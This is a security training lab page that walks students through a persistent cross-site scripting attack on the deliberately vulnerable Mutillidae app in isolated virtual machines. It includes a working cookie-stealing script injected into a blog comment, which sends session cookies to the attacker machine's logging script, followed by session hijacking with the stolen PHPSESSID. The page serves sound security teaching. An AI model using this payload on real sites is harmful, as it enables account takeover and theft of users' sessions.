ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 16015

(Mutillidae: Lesson 15)

{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }


Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is a Man-In-The-Middle attack?
    • The man-in-the-middle attack take on many forms.  The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).
     
  • What is a Reflective Cross Site Scripting?
    • The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
     
  • What is a Persistent Cross Site Scripting Injection?
    • The persistent XSS vulnerability is a more devastating variant because the injection is actually permanently stored in the blog, message board, etc.
    • Imagine if a sensitive website had a poor designer did not test for injections.  A malicious person could simply put in a hidden cookie harvester script and sit back and watch there logs for SESSION cookies.
     
  • What is Cookies Manager+?
    • Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.
    • In future labs, we will use Cookies Manager to help simulate a man-in-the-middle attack
     
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
    3. BackTrack: Lesson 9: How To Install Firebug
      • Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
    4. Mutillidae: Lesson 13: Reflected Cross Site Scripting Injection #1, Man-In-The-Middle
      • Note: If you have not completed the above lab, you will not be able to continue past Section 9:

  • References
  • Lab Notes
    • In this lab we will do the following:
      1. Due to a purposeful bug in the add-to-your-blog.php code, we will use Persistent Cross Site Scripting Techniques to covert send cookie data to a remote site.
      2. In the blog, we will place a covert persistent XSS injection in a blog to create a man-in-the-middle attack.
      3. We will capture the username and session credentials.
      4. From a remote machine we will login with those username and session credentials.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight Fedora14 - Mutillidae
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

     

Section 6: Open Console Terminal and Retrieve IP Address
  1. Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.112.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Mutillidae).

 

Section 7: Login to Damn Vulnerable WXP-SP2 (Victim Machine)
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Edit Virtual Machine Settings
    • Note(FYI):
      1. This third Virtual Machine does not have to be Windows XP.  I just need to be another Virtual Machine to demonstrate how the cookie will be sent covertly with the victim knowing.

     

  3. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".

     

  4. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine

     

  5. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: <Provide the Password>

     

  6. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt

     

  7. Obtain the IP Address
    • Instructions:
      1. In the Command Prompt type "ipconfig"
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine.
      • Record your IP Address.

 

Section 8: Start Apache Webserver
  1. Start Apache2 (On BackTrack5R1)
    • Instructions:
      1. service apache2 start
      2. service apache2 status
      3. ps -eaf | grep apache2 | grep -v grep
    • Note(FYI):
      1. Start up the apache2 webserver.
      2. Display the status of the apache2 webserver.
      3. See the processes of the apache2 webserver.

     

Section 9: Verify Cookie Script Exists
  1. Verify Cookie Script Exists (On BackTrack5R1)
    • Instructions:
      1. ls -l /usr/lib/cgi-bin/logit.pl
      2. cat /dev/null > /var/www/logdir/log.txt
      3. ls -l /var/www/logdir/log.txt
    • Note(FYI):
      1. List the logit.pl script.  If this script is not present, then complete the pre-requisite lab.
      2. Clear the log.txt havest0r file.
      3. Notice the log.txt is now a Zero Byte File.

 

Section 10: Open Mutillidae
  1. Open Firefox (On BackTrack5R1)
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/

     

  3. Reset Database
    • Instructions:
      1. Click the Reset DB Link
    • Notes (FYI):
      • This link will remove the XSS Injection from the database.

     

  4. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button

     

Section 11: Persistent Covert Cross Site Script(XSS)
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog

     

  2. Inspect Element
    • Instructions:
      1. Right Click in the Comment Box
      2. Click Inspect Element
    • Note(FYI):
      1. This is not a necessary step for the injection.  The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.

     

  3. Change Text Area Column Length
    • Instructions:
      1. Change 65 to 95
      2. Click Close Button (See Picture)

     

  4. Covert Cookie Harvest0r Cross Site Script (XSS) Injection
    • Note(FYI):
      1. Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
      2. This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
    • Instructions:
      1. Place the below text in the comment box.
        • <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
      2. Click the Save Blog Entry

     

  5. View Cookie Harvest0r Cross Site Script (XSS) Results
    • Note(FYI):
      1. Notice nothing is displayed under the comment cell.
      2. Or are your eyes deceiving you?

     

  6. View the Havest0r Log
    • Instructions:
      1. cat /var/www/logdir/log.txt
    • Notes (FYI):
      1. Although the Blog displayed nothing back to us, it was covertly recorded in our Havest0r log.
        • How do you like them apples?

 

Section 12: Login to Mutillidae
  1. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Open the Mutillidae Application
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
      2. Click Login/Register

     

  3. Login
    • Instructions:
      1. Name: samurai
      2. Password: samurai
      3. Click the Login Button
    • Notes(FYI):
      1. We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.

     

  4. View someone's blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someones's blog

     

  5. Show All Blog Entries
    • Instructions:
      1. Select Show All from the down drop menu
      2. View Blog Entries

     

  6. View Blog Entries
    • Note(FYI):
      1. Notice nothing is displayed under the comment cell.
      2. Is this Deja Vu?

 

Section 13: View Havest0r Log
  1. View the Havest0r Log (On BackTrack5R1)
    • Instructions:
      1. cat /var/www/logdir/log.txt
    • Notes (FYI):
      1. Notice the cookie now shows the username samurai.
      2. Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.

 

Section 14: Simulate Man-In-The-Middle Attack
  1. On BackTrack, Open Firefox (On BackTrack5R1)
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Start Cookies Manager+
    • Instructions:
      1. Tools --> Cookies Manager+
    • Notes (FYI):
      • Click here to install Cookie Manager+ you have not already done so.

     

  3. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  4. Add PHPSESSID Cookie Entry
    • Note(FYI):
      1. Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
      2. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: PHPSESSID
      2. Content: jri8sj5cnl6ironsqtnbpo9e21
      3. Host: 192.168.1.111
      4. Path: /
      5. Click the Save Button.

     

  5. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  6. Add showhints Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: showhints
      2. Content: 0
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button

     

  7. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  8. Add username Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: username
      2. Content: samurai
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button

     

  9. Add Cookie Entry
    • Instructions:
      1. Click the Add Button

     

  10. Add uid Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: uid
      2. Content: 6
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button
      6. Click the Close Button

     

  11. Implement Man-in-the-Middle Attack
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
      2. Notice you will be automagically logged in without a password.  For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
    • Instructions:
      1. http://192.168.1.111/mutillidae/
      2. Notice that user samurai logged in without a password.

 

Section 15: Proof of Lab
  1. On BackTrack, Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window

     

  2. Proof of Lab, (On a BackTrack Terminal)
    • Instructions:
      1. cd
      2. ls -l /usr/lib/cgi-bin/logit.pl
      3. cat /var/www/logdir/log.txt
      4. sqlite3 ~/.mozilla/firefox/*default/places.sqlite "select * from moz_places;" | grep "add-to-your-blog" | tail -1
        • sqlite3, A command line interface for SQLite version 3
        • Database File, ~/.mozilla/firefox/*default/places.sqlite
        • select * from moz_places, Display all records from the firefox history table.
        • grep "add-to-your-blog", Display records that only contain the string "add-to-your-blog".
        • tail -1, Only display the last record.
      5. date
      6. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth